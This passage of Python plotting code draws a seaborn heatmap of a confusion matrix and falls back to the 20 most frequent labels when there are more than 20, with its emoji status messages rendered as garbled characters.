# If too many labels, show a subset or use different visualization
if len(unique_labels) > 20:
    print(f"‚ö†Ô∏è Large number of labels ({len(unique_labels)}). Showing top 20 most frequent...")
    
    # Get top N most frequent labels
    from collections import Counter
    label_counts = Counter(y_true)
    top_labels = [label for label, _ in label_counts.most_common(20)]
    
    # Filter confusion matrix for top labels
    label_indices = [unique_labels.index(label) for label in top_labels]
    conf_matrix_subset = conf_matrix[np.ix_(label_indices, label_indices)]
    
    # Plot subset
    sns.heatmap(conf_matrix_subset, 
                annot=True, 
                fmt='d', 
                cmap='Blues',
                xticklabels=top_labels,
                yticklabels=top_labels,
                ax=ax,
                cbar_kws={'label': 'Count'})
    
    plt.title(f'Confusion Matrix (Top 20 Labels)\nTotal Labels: {len(unique_labels)}', 
              fontsize=16, fontweight='bold', pad=20)
else:
    # Plot full confusion matrix
    sns.heatmap(conf_matrix, 
                annot=True, 
                fmt='d', 
                cmap='Blues',
                xticklabels=unique_labels,
                yticklabels=unique_labels,
                ax=ax,
                cbar_kws={'label': 'Count'})
    
    plt.title('Confusion Matrix - All Labels', fontsize=16, fontweight='bold', pad=20)

plt.xlabel('Predicted Label', fontsize=12, fontweight='bold')
plt.ylabel('True Label', fontsize=12, fontweight='bold')
plt.xticks(rotation=45, ha='right')
plt.yticks(rotation=0)
plt.tight_layout()
plt.show()

print("‚úÖ Confusion matrix visualization created!")